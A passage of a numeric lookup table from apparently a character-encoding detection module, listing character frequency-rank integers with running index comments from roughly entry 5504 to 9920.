-5893,5894,5895,5896,5897,5898,5899,5900,5901,5902,5903,5904,5905,5906,5907,5908, # 5504 -5909,5910,5911,5912,5913,5914,5915,5916,5917,5918,5919,5920,5921,5922,5923,5924, # 5520 -5925,5926,5927,5928,5929,5930,5931,5932,5933,5934,5935,5936,5937,5938,5939,5940, # 5536 -5941,5942,5943,5944,5945,5946,5947,5948,5949,5950,5951,5952,5953,5954,5955,5956, # 5552 -5957,5958,5959,5960,5961,5962,5963,5964,5965,5966,5967,5968,5969,5970,5971,5972, # 5568 -5973,5974,5975,5976,5977,5978,5979,5980,5981,5982,5983,5984,5985,5986,5987,5988, # 5584 -5989,5990,5991,5992,5993,5994,5995,5996,5997,5998,5999,6000,6001,6002,6003,6004, # 5600 -6005,6006,6007,6008,6009,6010,6011,6012,6013,6014,6015,6016,6017,6018,6019,6020, # 5616 -6021,6022,6023,6024,6025,6026,6027,6028,6029,6030,6031,6032,6033,6034,6035,6036, # 5632 -6037,6038,6039,6040,6041,6042,6043,6044,6045,6046,6047,6048,6049,6050,6051,6052, # 5648 -6053,6054,6055,6056,6057,6058,6059,6060,6061,6062,6063,6064,6065,6066,6067,6068, # 5664 -6069,6070,6071,6072,6073,6074,6075,6076,6077,6078,6079,6080,6081,6082,6083,6084, # 5680 -6085,6086,6087,6088,6089,6090,6091,6092,6093,6094,6095,6096,6097,6098,6099,6100, # 5696 -6101,6102,6103,6104,6105,6106,6107,6108,6109,6110,6111,6112,6113,6114,6115,6116, # 5712 -6117,6118,6119,6120,6121,6122,6123,6124,6125,6126,6127,6128,6129,6130,6131,6132, # 5728 -6133,6134,6135,6136,6137,6138,6139,6140,6141,6142,6143,6144,6145,6146,6147,6148, # 5744 -6149,6150,6151,6152,6153,6154,6155,6156,6157,6158,6159,6160,6161,6162,6163,6164, # 5760 -6165,6166,6167,6168,6169,6170,6171,6172,6173,6174,6175,6176,6177,6178,6179,6180, # 5776 -6181,6182,6183,6184,6185,6186,6187,6188,6189,6190,6191,6192,6193,6194,6195,6196, # 5792 -6197,6198,6199,6200,6201,6202,6203,6204,6205,6206,6207,6208,6209,6210,6211,6212, # 5808 -6213,6214,6215,6216,6217,6218,6219,6220,6221,6222,6223,3670,6224,6225,6226,6227, # 5824 -6228,6229,6230,6231,6232,6233,6234,6235,6236,6237,6238,6239,6240,6241,6242,6243, # 5840 -6244,6245,6246,6247,6248,6249,6250,6251,6252,6253,6254,6255,6256,6257,6258,6259, # 5856 -6260,6261,6262,6263,6264,6265,6266,6267,6268,6269,6270,6271,6272,6273,6274,6275, # 5872 -6276,6277,6278,6279,6280,6281,6282,6283,6284,6285,4815,6286,6287,6288,6289,6290, # 5888 -6291,6292,4816,6293,6294,6295,6296,6297,6298,6299,6300,6301,6302,6303,6304,6305, # 5904 -6306,6307,6308,6309,6310,6311,4817,4818,6312,6313,6314,6315,6316,6317,6318,4819, # 5920 -6319,6320,6321,6322,6323,6324,6325,6326,6327,6328,6329,6330,6331,6332,6333,6334, # 5936 -6335,6336,6337,4820,6338,6339,6340,6341,6342,6343,6344,6345,6346,6347,6348,6349, # 5952 -6350,6351,6352,6353,6354,6355,6356,6357,6358,6359,6360,6361,6362,6363,6364,6365, # 5968 -6366,6367,6368,6369,6370,6371,6372,6373,6374,6375,6376,6377,6378,6379,6380,6381, # 5984 -6382,6383,6384,6385,6386,6387,6388,6389,6390,6391,6392,6393,6394,6395,6396,6397, # 6000 -6398,6399,6400,6401,6402,6403,6404,6405,6406,6407,6408,6409,6410,3441,6411,6412, # 6016 -6413,6414,6415,6416,6417,6418,6419,6420,6421,6422,6423,6424,6425,4440,6426,6427, # 6032 -6428,6429,6430,6431,6432,6433,6434,6435,6436,6437,6438,6439,6440,6441,6442,6443, # 6048 -6444,6445,6446,6447,6448,6449,6450,6451,6452,6453,6454,4821,6455,6456,6457,6458, # 6064 -6459,6460,6461,6462,6463,6464,6465,6466,6467,6468,6469,6470,6471,6472,6473,6474, # 6080 -6475,6476,6477,3947,3948,6478,6479,6480,6481,3272,4441,6482,6483,6484,6485,4442, # 6096 -6486,6487,6488,6489,6490,6491,6492,6493,6494,6495,6496,4822,6497,6498,6499,6500, # 6112 -6501,6502,6503,6504,6505,6506,6507,6508,6509,6510,6511,6512,6513,6514,6515,6516, # 6128 -6517,6518,6519,6520,6521,6522,6523,6524,6525,6526,6527,6528,6529,6530,6531,6532, # 6144 -6533,6534,6535,6536,6537,6538,6539,6540,6541,6542,6543,6544,6545,6546,6547,6548, # 6160 -6549,6550,6551,6552,6553,6554,6555,6556,2784,6557,4823,6558,6559,6560,6561,6562, # 6176 -6563,6564,6565,6566,6567,6568,6569,3949,6570,6571,6572,4824,6573,6574,6575,6576, # 6192 -6577,6578,6579,6580,6581,6582,6583,4825,6584,6585,6586,3950,2785,6587,6588,6589, # 6208 -6590,6591,6592,6593,6594,6595,6596,6597,6598,6599,6600,6601,6602,6603,6604,6605, # 6224 -6606,6607,6608,6609,6610,6611,6612,4826,6613,6614,6615,4827,6616,6617,6618,6619, # 6240 -6620,6621,6622,6623,6624,6625,4164,6626,6627,6628,6629,6630,6631,6632,6633,6634, # 6256 -3547,6635,4828,6636,6637,6638,6639,6640,6641,6642,3951,2984,6643,6644,6645,6646, # 6272 -6647,6648,6649,4165,6650,4829,6651,6652,4830,6653,6654,6655,6656,6657,6658,6659, # 6288 -6660,6661,6662,4831,6663,6664,6665,6666,6667,6668,6669,6670,6671,4166,6672,4832, # 6304 -3952,6673,6674,6675,6676,4833,6677,6678,6679,4167,6680,6681,6682,3198,6683,6684, # 6320 -6685,6686,6687,6688,6689,6690,6691,6692,6693,6694,6695,6696,6697,4834,6698,6699, # 6336 -6700,6701,6702,6703,6704,6705,6706,6707,6708,6709,6710,6711,6712,6713,6714,6715, # 6352 -6716,6717,6718,6719,6720,6721,6722,6723,6724,6725,6726,6727,6728,6729,6730,6731, # 6368 -6732,6733,6734,4443,6735,6736,6737,6738,6739,6740,6741,6742,6743,6744,6745,4444, # 6384 -6746,6747,6748,6749,6750,6751,6752,6753,6754,6755,6756,6757,6758,6759,6760,6761, # 6400 -6762,6763,6764,6765,6766,6767,6768,6769,6770,6771,6772,6773,6774,6775,6776,6777, # 6416 -6778,6779,6780,6781,4168,6782,6783,3442,6784,6785,6786,6787,6788,6789,6790,6791, # 6432 -4169,6792,6793,6794,6795,6796,6797,6798,6799,6800,6801,6802,6803,6804,6805,6806, # 6448 -6807,6808,6809,6810,6811,4835,6812,6813,6814,4445,6815,6816,4446,6817,6818,6819, # 6464 -6820,6821,6822,6823,6824,6825,6826,6827,6828,6829,6830,6831,6832,6833,6834,6835, # 6480 -3548,6836,6837,6838,6839,6840,6841,6842,6843,6844,6845,6846,4836,6847,6848,6849, # 6496 -6850,6851,6852,6853,6854,3953,6855,6856,6857,6858,6859,6860,6861,6862,6863,6864, # 6512 -6865,6866,6867,6868,6869,6870,6871,6872,6873,6874,6875,6876,6877,3199,6878,6879, # 6528 -6880,6881,6882,4447,6883,6884,6885,6886,6887,6888,6889,6890,6891,6892,6893,6894, # 6544 -6895,6896,6897,6898,6899,6900,6901,6902,6903,6904,4170,6905,6906,6907,6908,6909, # 6560 -6910,6911,6912,6913,6914,6915,6916,6917,6918,6919,6920,6921,6922,6923,6924,6925, # 6576 -6926,6927,4837,6928,6929,6930,6931,6932,6933,6934,6935,6936,3346,6937,6938,4838, # 6592 -6939,6940,6941,4448,6942,6943,6944,6945,6946,4449,6947,6948,6949,6950,6951,6952, # 6608 -6953,6954,6955,6956,6957,6958,6959,6960,6961,6962,6963,6964,6965,6966,6967,6968, # 6624 -6969,6970,6971,6972,6973,6974,6975,6976,6977,6978,6979,6980,6981,6982,6983,6984, # 6640 -6985,6986,6987,6988,6989,6990,6991,6992,6993,6994,3671,6995,6996,6997,6998,4839, # 6656 -6999,7000,7001,7002,3549,7003,7004,7005,7006,7007,7008,7009,7010,7011,7012,7013, # 6672 -7014,7015,7016,7017,7018,7019,7020,7021,7022,7023,7024,7025,7026,7027,7028,7029, # 6688 -7030,4840,7031,7032,7033,7034,7035,7036,7037,7038,4841,7039,7040,7041,7042,7043, # 6704 -7044,7045,7046,7047,7048,7049,7050,7051,7052,7053,7054,7055,7056,7057,7058,7059, # 6720 -7060,7061,7062,7063,7064,7065,7066,7067,7068,7069,7070,2985,7071,7072,7073,7074, # 6736 -7075,7076,7077,7078,7079,7080,4842,7081,7082,7083,7084,7085,7086,7087,7088,7089, # 6752 -7090,7091,7092,7093,7094,7095,7096,7097,7098,7099,7100,7101,7102,7103,7104,7105, # 6768 -7106,7107,7108,7109,7110,7111,7112,7113,7114,7115,7116,7117,7118,4450,7119,7120, # 6784 -7121,7122,7123,7124,7125,7126,7127,7128,7129,7130,7131,7132,7133,7134,7135,7136, # 6800 -7137,7138,7139,7140,7141,7142,7143,4843,7144,7145,7146,7147,7148,7149,7150,7151, # 6816 -7152,7153,7154,7155,7156,7157,7158,7159,7160,7161,7162,7163,7164,7165,7166,7167, # 6832 -7168,7169,7170,7171,7172,7173,7174,7175,7176,7177,7178,7179,7180,7181,7182,7183, # 6848 -7184,7185,7186,7187,7188,4171,4172,7189,7190,7191,7192,7193,7194,7195,7196,7197, # 6864 -7198,7199,7200,7201,7202,7203,7204,7205,7206,7207,7208,7209,7210,7211,7212,7213, # 6880 -7214,7215,7216,7217,7218,7219,7220,7221,7222,7223,7224,7225,7226,7227,7228,7229, # 6896 -7230,7231,7232,7233,7234,7235,7236,7237,7238,7239,7240,7241,7242,7243,7244,7245, # 6912 -7246,7247,7248,7249,7250,7251,7252,7253,7254,7255,7256,7257,7258,7259,7260,7261, # 6928 -7262,7263,7264,7265,7266,7267,7268,7269,7270,7271,7272,7273,7274,7275,7276,7277, # 6944 -7278,7279,7280,7281,7282,7283,7284,7285,7286,7287,7288,7289,7290,7291,7292,7293, # 6960 -7294,7295,7296,4844,7297,7298,7299,7300,7301,7302,7303,7304,7305,7306,7307,7308, # 6976 -7309,7310,7311,7312,7313,7314,7315,7316,4451,7317,7318,7319,7320,7321,7322,7323, # 6992 -7324,7325,7326,7327,7328,7329,7330,7331,7332,7333,7334,7335,7336,7337,7338,7339, # 7008 -7340,7341,7342,7343,7344,7345,7346,7347,7348,7349,7350,7351,7352,7353,4173,7354, # 7024 -7355,4845,7356,7357,7358,7359,7360,7361,7362,7363,7364,7365,7366,7367,7368,7369, # 7040 -7370,7371,7372,7373,7374,7375,7376,7377,7378,7379,7380,7381,7382,7383,7384,7385, # 7056 -7386,7387,7388,4846,7389,7390,7391,7392,7393,7394,7395,7396,7397,7398,7399,7400, # 7072 -7401,7402,7403,7404,7405,3672,7406,7407,7408,7409,7410,7411,7412,7413,7414,7415, # 7088 -7416,7417,7418,7419,7420,7421,7422,7423,7424,7425,7426,7427,7428,7429,7430,7431, # 7104 -7432,7433,7434,7435,7436,7437,7438,7439,7440,7441,7442,7443,7444,7445,7446,7447, # 7120 -7448,7449,7450,7451,7452,7453,4452,7454,3200,7455,7456,7457,7458,7459,7460,7461, # 7136 -7462,7463,7464,7465,7466,7467,7468,7469,7470,7471,7472,7473,7474,4847,7475,7476, # 7152 -7477,3133,7478,7479,7480,7481,7482,7483,7484,7485,7486,7487,7488,7489,7490,7491, # 7168 -7492,7493,7494,7495,7496,7497,7498,7499,7500,7501,7502,3347,7503,7504,7505,7506, # 7184 -7507,7508,7509,7510,7511,7512,7513,7514,7515,7516,7517,7518,7519,7520,7521,4848, # 7200 -7522,7523,7524,7525,7526,7527,7528,7529,7530,7531,7532,7533,7534,7535,7536,7537, # 7216 -7538,7539,7540,7541,7542,7543,7544,7545,7546,7547,7548,7549,3801,4849,7550,7551, # 7232 -7552,7553,7554,7555,7556,7557,7558,7559,7560,7561,7562,7563,7564,7565,7566,7567, # 7248 -7568,7569,3035,7570,7571,7572,7573,7574,7575,7576,7577,7578,7579,7580,7581,7582, # 7264 -7583,7584,7585,7586,7587,7588,7589,7590,7591,7592,7593,7594,7595,7596,7597,7598, # 7280 -7599,7600,7601,7602,7603,7604,7605,7606,7607,7608,7609,7610,7611,7612,7613,7614, # 7296 -7615,7616,4850,7617,7618,3802,7619,7620,7621,7622,7623,7624,7625,7626,7627,7628, # 7312 -7629,7630,7631,7632,4851,7633,7634,7635,7636,7637,7638,7639,7640,7641,7642,7643, # 7328 -7644,7645,7646,7647,7648,7649,7650,7651,7652,7653,7654,7655,7656,7657,7658,7659, # 7344 -7660,7661,7662,7663,7664,7665,7666,7667,7668,7669,7670,4453,7671,7672,7673,7674, # 7360 -7675,7676,7677,7678,7679,7680,7681,7682,7683,7684,7685,7686,7687,7688,7689,7690, # 7376 -7691,7692,7693,7694,7695,7696,7697,3443,7698,7699,7700,7701,7702,4454,7703,7704, # 7392 -7705,7706,7707,7708,7709,7710,7711,7712,7713,2472,7714,7715,7716,7717,7718,7719, # 7408 -7720,7721,7722,7723,7724,7725,7726,7727,7728,7729,7730,7731,3954,7732,7733,7734, # 7424 -7735,7736,7737,7738,7739,7740,7741,7742,7743,7744,7745,7746,7747,7748,7749,7750, # 7440 -3134,7751,7752,4852,7753,7754,7755,4853,7756,7757,7758,7759,7760,4174,7761,7762, # 7456 -7763,7764,7765,7766,7767,7768,7769,7770,7771,7772,7773,7774,7775,7776,7777,7778, # 7472 -7779,7780,7781,7782,7783,7784,7785,7786,7787,7788,7789,7790,7791,7792,7793,7794, # 7488 -7795,7796,7797,7798,7799,7800,7801,7802,7803,7804,7805,4854,7806,7807,7808,7809, # 7504 -7810,7811,7812,7813,7814,7815,7816,7817,7818,7819,7820,7821,7822,7823,7824,7825, # 7520 -4855,7826,7827,7828,7829,7830,7831,7832,7833,7834,7835,7836,7837,7838,7839,7840, # 7536 -7841,7842,7843,7844,7845,7846,7847,3955,7848,7849,7850,7851,7852,7853,7854,7855, # 7552 -7856,7857,7858,7859,7860,3444,7861,7862,7863,7864,7865,7866,7867,7868,7869,7870, # 7568 -7871,7872,7873,7874,7875,7876,7877,7878,7879,7880,7881,7882,7883,7884,7885,7886, # 7584 -7887,7888,7889,7890,7891,4175,7892,7893,7894,7895,7896,4856,4857,7897,7898,7899, # 7600 -7900,2598,7901,7902,7903,7904,7905,7906,7907,7908,4455,7909,7910,7911,7912,7913, # 7616 -7914,3201,7915,7916,7917,7918,7919,7920,7921,4858,7922,7923,7924,7925,7926,7927, # 7632 -7928,7929,7930,7931,7932,7933,7934,7935,7936,7937,7938,7939,7940,7941,7942,7943, # 7648 -7944,7945,7946,7947,7948,7949,7950,7951,7952,7953,7954,7955,7956,7957,7958,7959, # 7664 -7960,7961,7962,7963,7964,7965,7966,7967,7968,7969,7970,7971,7972,7973,7974,7975, # 7680 -7976,7977,7978,7979,7980,7981,4859,7982,7983,7984,7985,7986,7987,7988,7989,7990, # 7696 -7991,7992,7993,7994,7995,7996,4860,7997,7998,7999,8000,8001,8002,8003,8004,8005, # 7712 -8006,8007,8008,8009,8010,8011,8012,8013,8014,8015,8016,4176,8017,8018,8019,8020, # 7728 -8021,8022,8023,4861,8024,8025,8026,8027,8028,8029,8030,8031,8032,8033,8034,8035, # 7744 -8036,4862,4456,8037,8038,8039,8040,4863,8041,8042,8043,8044,8045,8046,8047,8048, # 7760 -8049,8050,8051,8052,8053,8054,8055,8056,8057,8058,8059,8060,8061,8062,8063,8064, # 7776 -8065,8066,8067,8068,8069,8070,8071,8072,8073,8074,8075,8076,8077,8078,8079,8080, # 7792 -8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096, # 7808 -8097,8098,8099,4864,4177,8100,8101,8102,8103,8104,8105,8106,8107,8108,8109,8110, # 7824 -8111,8112,8113,8114,8115,8116,8117,8118,8119,8120,4178,8121,8122,8123,8124,8125, # 7840 -8126,8127,8128,8129,8130,8131,8132,8133,8134,8135,8136,8137,8138,8139,8140,8141, # 7856 -8142,8143,8144,8145,4865,4866,8146,8147,8148,8149,8150,8151,8152,8153,8154,8155, # 7872 -8156,8157,8158,8159,8160,8161,8162,8163,8164,8165,4179,8166,8167,8168,8169,8170, # 7888 -8171,8172,8173,8174,8175,8176,8177,8178,8179,8180,8181,4457,8182,8183,8184,8185, # 7904 -8186,8187,8188,8189,8190,8191,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201, # 7920 -8202,8203,8204,8205,8206,8207,8208,8209,8210,8211,8212,8213,8214,8215,8216,8217, # 7936 -8218,8219,8220,8221,8222,8223,8224,8225,8226,8227,8228,8229,8230,8231,8232,8233, # 7952 -8234,8235,8236,8237,8238,8239,8240,8241,8242,8243,8244,8245,8246,8247,8248,8249, # 7968 -8250,8251,8252,8253,8254,8255,8256,3445,8257,8258,8259,8260,8261,8262,4458,8263, # 7984 -8264,8265,8266,8267,8268,8269,8270,8271,8272,4459,8273,8274,8275,8276,3550,8277, # 8000 -8278,8279,8280,8281,8282,8283,8284,8285,8286,8287,8288,8289,4460,8290,8291,8292, # 8016 -8293,8294,8295,8296,8297,8298,8299,8300,8301,8302,8303,8304,8305,8306,8307,4867, # 8032 -8308,8309,8310,8311,8312,3551,8313,8314,8315,8316,8317,8318,8319,8320,8321,8322, # 8048 -8323,8324,8325,8326,4868,8327,8328,8329,8330,8331,8332,8333,8334,8335,8336,8337, # 8064 -8338,8339,8340,8341,8342,8343,8344,8345,8346,8347,8348,8349,8350,8351,8352,8353, # 8080 -8354,8355,8356,8357,8358,8359,8360,8361,8362,8363,4869,4461,8364,8365,8366,8367, # 8096 -8368,8369,8370,4870,8371,8372,8373,8374,8375,8376,8377,8378,8379,8380,8381,8382, # 8112 -8383,8384,8385,8386,8387,8388,8389,8390,8391,8392,8393,8394,8395,8396,8397,8398, # 8128 -8399,8400,8401,8402,8403,8404,8405,8406,8407,8408,8409,8410,4871,8411,8412,8413, # 8144 -8414,8415,8416,8417,8418,8419,8420,8421,8422,4462,8423,8424,8425,8426,8427,8428, # 8160 -8429,8430,8431,8432,8433,2986,8434,8435,8436,8437,8438,8439,8440,8441,8442,8443, # 8176 -8444,8445,8446,8447,8448,8449,8450,8451,8452,8453,8454,8455,8456,8457,8458,8459, # 8192 -8460,8461,8462,8463,8464,8465,8466,8467,8468,8469,8470,8471,8472,8473,8474,8475, # 8208 -8476,8477,8478,4180,8479,8480,8481,8482,8483,8484,8485,8486,8487,8488,8489,8490, # 8224 -8491,8492,8493,8494,8495,8496,8497,8498,8499,8500,8501,8502,8503,8504,8505,8506, # 8240 -8507,8508,8509,8510,8511,8512,8513,8514,8515,8516,8517,8518,8519,8520,8521,8522, # 8256 -8523,8524,8525,8526,8527,8528,8529,8530,8531,8532,8533,8534,8535,8536,8537,8538, # 8272 -8539,8540,8541,8542,8543,8544,8545,8546,8547,8548,8549,8550,8551,8552,8553,8554, # 8288 -8555,8556,8557,8558,8559,8560,8561,8562,8563,8564,4872,8565,8566,8567,8568,8569, # 8304 -8570,8571,8572,8573,4873,8574,8575,8576,8577,8578,8579,8580,8581,8582,8583,8584, # 8320 -8585,8586,8587,8588,8589,8590,8591,8592,8593,8594,8595,8596,8597,8598,8599,8600, # 8336 -8601,8602,8603,8604,8605,3803,8606,8607,8608,8609,8610,8611,8612,8613,4874,3804, # 8352 -8614,8615,8616,8617,8618,8619,8620,8621,3956,8622,8623,8624,8625,8626,8627,8628, # 8368 -8629,8630,8631,8632,8633,8634,8635,8636,8637,8638,2865,8639,8640,8641,8642,8643, # 8384 -8644,8645,8646,8647,8648,8649,8650,8651,8652,8653,8654,8655,8656,4463,8657,8658, # 8400 -8659,4875,4876,8660,8661,8662,8663,8664,8665,8666,8667,8668,8669,8670,8671,8672, # 8416 -8673,8674,8675,8676,8677,8678,8679,8680,8681,4464,8682,8683,8684,8685,8686,8687, # 8432 -8688,8689,8690,8691,8692,8693,8694,8695,8696,8697,8698,8699,8700,8701,8702,8703, # 8448 -8704,8705,8706,8707,8708,8709,2261,8710,8711,8712,8713,8714,8715,8716,8717,8718, # 8464 -8719,8720,8721,8722,8723,8724,8725,8726,8727,8728,8729,8730,8731,8732,8733,4181, # 8480 -8734,8735,8736,8737,8738,8739,8740,8741,8742,8743,8744,8745,8746,8747,8748,8749, # 8496 -8750,8751,8752,8753,8754,8755,8756,8757,8758,8759,8760,8761,8762,8763,4877,8764, # 8512 -8765,8766,8767,8768,8769,8770,8771,8772,8773,8774,8775,8776,8777,8778,8779,8780, # 8528 -8781,8782,8783,8784,8785,8786,8787,8788,4878,8789,4879,8790,8791,8792,4880,8793, # 8544 -8794,8795,8796,8797,8798,8799,8800,8801,4881,8802,8803,8804,8805,8806,8807,8808, # 8560 -8809,8810,8811,8812,8813,8814,8815,3957,8816,8817,8818,8819,8820,8821,8822,8823, # 8576 -8824,8825,8826,8827,8828,8829,8830,8831,8832,8833,8834,8835,8836,8837,8838,8839, # 8592 -8840,8841,8842,8843,8844,8845,8846,8847,4882,8848,8849,8850,8851,8852,8853,8854, # 8608 -8855,8856,8857,8858,8859,8860,8861,8862,8863,8864,8865,8866,8867,8868,8869,8870, # 8624 -8871,8872,8873,8874,8875,8876,8877,8878,8879,8880,8881,8882,8883,8884,3202,8885, # 8640 -8886,8887,8888,8889,8890,8891,8892,8893,8894,8895,8896,8897,8898,8899,8900,8901, # 8656 -8902,8903,8904,8905,8906,8907,8908,8909,8910,8911,8912,8913,8914,8915,8916,8917, # 8672 -8918,8919,8920,8921,8922,8923,8924,4465,8925,8926,8927,8928,8929,8930,8931,8932, # 8688 -4883,8933,8934,8935,8936,8937,8938,8939,8940,8941,8942,8943,2214,8944,8945,8946, # 8704 -8947,8948,8949,8950,8951,8952,8953,8954,8955,8956,8957,8958,8959,8960,8961,8962, # 8720 -8963,8964,8965,4884,8966,8967,8968,8969,8970,8971,8972,8973,8974,8975,8976,8977, # 8736 -8978,8979,8980,8981,8982,8983,8984,8985,8986,8987,8988,8989,8990,8991,8992,4885, # 8752 -8993,8994,8995,8996,8997,8998,8999,9000,9001,9002,9003,9004,9005,9006,9007,9008, # 8768 -9009,9010,9011,9012,9013,9014,9015,9016,9017,9018,9019,9020,9021,4182,9022,9023, # 8784 -9024,9025,9026,9027,9028,9029,9030,9031,9032,9033,9034,9035,9036,9037,9038,9039, # 8800 -9040,9041,9042,9043,9044,9045,9046,9047,9048,9049,9050,9051,9052,9053,9054,9055, # 8816 -9056,9057,9058,9059,9060,9061,9062,9063,4886,9064,9065,9066,9067,9068,9069,4887, # 8832 -9070,9071,9072,9073,9074,9075,9076,9077,9078,9079,9080,9081,9082,9083,9084,9085, # 8848 -9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9101, # 8864 -9102,9103,9104,9105,9106,9107,9108,9109,9110,9111,9112,9113,9114,9115,9116,9117, # 8880 -9118,9119,9120,9121,9122,9123,9124,9125,9126,9127,9128,9129,9130,9131,9132,9133, # 8896 -9134,9135,9136,9137,9138,9139,9140,9141,3958,9142,9143,9144,9145,9146,9147,9148, # 8912 -9149,9150,9151,4888,9152,9153,9154,9155,9156,9157,9158,9159,9160,9161,9162,9163, # 8928 -9164,9165,9166,9167,9168,9169,9170,9171,9172,9173,9174,9175,4889,9176,9177,9178, # 8944 -9179,9180,9181,9182,9183,9184,9185,9186,9187,9188,9189,9190,9191,9192,9193,9194, # 8960 -9195,9196,9197,9198,9199,9200,9201,9202,9203,4890,9204,9205,9206,9207,9208,9209, # 8976 -9210,9211,9212,9213,9214,9215,9216,9217,9218,9219,9220,9221,9222,4466,9223,9224, # 8992 -9225,9226,9227,9228,9229,9230,9231,9232,9233,9234,9235,9236,9237,9238,9239,9240, # 9008 -9241,9242,9243,9244,9245,4891,9246,9247,9248,9249,9250,9251,9252,9253,9254,9255, # 9024 -9256,9257,4892,9258,9259,9260,9261,4893,4894,9262,9263,9264,9265,9266,9267,9268, # 9040 -9269,9270,9271,9272,9273,4467,9274,9275,9276,9277,9278,9279,9280,9281,9282,9283, # 9056 -9284,9285,3673,9286,9287,9288,9289,9290,9291,9292,9293,9294,9295,9296,9297,9298, # 9072 -9299,9300,9301,9302,9303,9304,9305,9306,9307,9308,9309,9310,9311,9312,9313,9314, # 9088 -9315,9316,9317,9318,9319,9320,9321,9322,4895,9323,9324,9325,9326,9327,9328,9329, # 9104 -9330,9331,9332,9333,9334,9335,9336,9337,9338,9339,9340,9341,9342,9343,9344,9345, # 9120 -9346,9347,4468,9348,9349,9350,9351,9352,9353,9354,9355,9356,9357,9358,9359,9360, # 9136 -9361,9362,9363,9364,9365,9366,9367,9368,9369,9370,9371,9372,9373,4896,9374,4469, # 9152 -9375,9376,9377,9378,9379,4897,9380,9381,9382,9383,9384,9385,9386,9387,9388,9389, # 9168 -9390,9391,9392,9393,9394,9395,9396,9397,9398,9399,9400,9401,9402,9403,9404,9405, # 9184 -9406,4470,9407,2751,9408,9409,3674,3552,9410,9411,9412,9413,9414,9415,9416,9417, # 9200 -9418,9419,9420,9421,4898,9422,9423,9424,9425,9426,9427,9428,9429,3959,9430,9431, # 9216 -9432,9433,9434,9435,9436,4471,9437,9438,9439,9440,9441,9442,9443,9444,9445,9446, # 9232 -9447,9448,9449,9450,3348,9451,9452,9453,9454,9455,9456,9457,9458,9459,9460,9461, # 9248 -9462,9463,9464,9465,9466,9467,9468,9469,9470,9471,9472,4899,9473,9474,9475,9476, # 9264 -9477,4900,9478,9479,9480,9481,9482,9483,9484,9485,9486,9487,9488,3349,9489,9490, # 9280 -9491,9492,9493,9494,9495,9496,9497,9498,9499,9500,9501,9502,9503,9504,9505,9506, # 9296 -9507,9508,9509,9510,9511,9512,9513,9514,9515,9516,9517,9518,9519,9520,4901,9521, # 9312 -9522,9523,9524,9525,9526,4902,9527,9528,9529,9530,9531,9532,9533,9534,9535,9536, # 9328 -9537,9538,9539,9540,9541,9542,9543,9544,9545,9546,9547,9548,9549,9550,9551,9552, # 9344 -9553,9554,9555,9556,9557,9558,9559,9560,9561,9562,9563,9564,9565,9566,9567,9568, # 9360 -9569,9570,9571,9572,9573,9574,9575,9576,9577,9578,9579,9580,9581,9582,9583,9584, # 9376 -3805,9585,9586,9587,9588,9589,9590,9591,9592,9593,9594,9595,9596,9597,9598,9599, # 9392 -9600,9601,9602,4903,9603,9604,9605,9606,9607,4904,9608,9609,9610,9611,9612,9613, # 9408 -9614,4905,9615,9616,9617,9618,9619,9620,9621,9622,9623,9624,9625,9626,9627,9628, # 9424 -9629,9630,9631,9632,4906,9633,9634,9635,9636,9637,9638,9639,9640,9641,9642,9643, # 9440 -4907,9644,9645,9646,9647,9648,9649,9650,9651,9652,9653,9654,9655,9656,9657,9658, # 9456 -9659,9660,9661,9662,9663,9664,9665,9666,9667,9668,9669,9670,9671,9672,4183,9673, # 9472 -9674,9675,9676,9677,4908,9678,9679,9680,9681,4909,9682,9683,9684,9685,9686,9687, # 9488 -9688,9689,9690,4910,9691,9692,9693,3675,9694,9695,9696,2945,9697,9698,9699,9700, # 9504 -9701,9702,9703,9704,9705,4911,9706,9707,9708,9709,9710,9711,9712,9713,9714,9715, # 9520 -9716,9717,9718,9719,9720,9721,9722,9723,9724,9725,9726,9727,9728,9729,9730,9731, # 9536 -9732,9733,9734,9735,4912,9736,9737,9738,9739,9740,4913,9741,9742,9743,9744,9745, # 9552 -9746,9747,9748,9749,9750,9751,9752,9753,9754,9755,9756,9757,9758,4914,9759,9760, # 9568 -9761,9762,9763,9764,9765,9766,9767,9768,9769,9770,9771,9772,9773,9774,9775,9776, # 9584 -9777,9778,9779,9780,9781,9782,4915,9783,9784,9785,9786,9787,9788,9789,9790,9791, # 9600 -9792,9793,4916,9794,9795,9796,9797,9798,9799,9800,9801,9802,9803,9804,9805,9806, # 9616 -9807,9808,9809,9810,9811,9812,9813,9814,9815,9816,9817,9818,9819,9820,9821,9822, # 9632 -9823,9824,9825,9826,9827,9828,9829,9830,9831,9832,9833,9834,9835,9836,9837,9838, # 9648 -9839,9840,9841,9842,9843,9844,9845,9846,9847,9848,9849,9850,9851,9852,9853,9854, # 9664 -9855,9856,9857,9858,9859,9860,9861,9862,9863,9864,9865,9866,9867,9868,4917,9869, # 9680 -9870,9871,9872,9873,9874,9875,9876,9877,9878,9879,9880,9881,9882,9883,9884,9885, # 9696 -9886,9887,9888,9889,9890,9891,9892,4472,9893,9894,9895,9896,9897,3806,9898,9899, # 9712 -9900,9901,9902,9903,9904,9905,9906,9907,9908,9909,9910,9911,9912,9913,9914,4918, # 9728 -9915,9916,9917,4919,9918,9919,9920,9921,4184,9922,9923,9924,9925,9926,9927,9928, # 9744 -9929,9930,9931,9932,9933,9934,9935,9936,9937,9938,9939,9940,9941,9942,9943,9944, # 9760 -9945,9946,4920,9947,9948,9949,9950,9951,9952,9953,9954,9955,4185,9956,9957,9958, # 9776 -9959,9960,9961,9962,9963,9964,9965,4921,9966,9967,9968,4473,9969,9970,9971,9972, # 9792 -9973,9974,9975,9976,9977,4474,9978,9979,9980,9981,9982,9983,9984,9985,9986,9987, # 9808 -9988,9989,9990,9991,9992,9993,9994,9995,9996,9997,9998,9999,10000,10001,10002,10003, # 9824 -10004,10005,10006,10007,10008,10009,10010,10011,10012,10013,10014,10015,10016,10017,10018,10019, # 9840 -10020,10021,4922,10022,4923,10023,10024,10025,10026,10027,10028,10029,10030,10031,10032,10033, # 9856 -10034,10035,10036,10037,10038,10039,10040,10041,10042,10043,10044,10045,10046,10047,10048,4924, # 9872 -10049,10050,10051,10052,10053,10054,10055,10056,10057,10058,10059,10060,10061,10062,10063,10064, # 9888 -10065,10066,10067,10068,10069,10070,10071,10072,10073,10074,10075,10076,10077,10078,10079,10080, # 9904 -10081,10082,10083,10084,10085,10086,10087,4475,10088,10089,10090,10091,10092,10093,10094,10095, # 9920 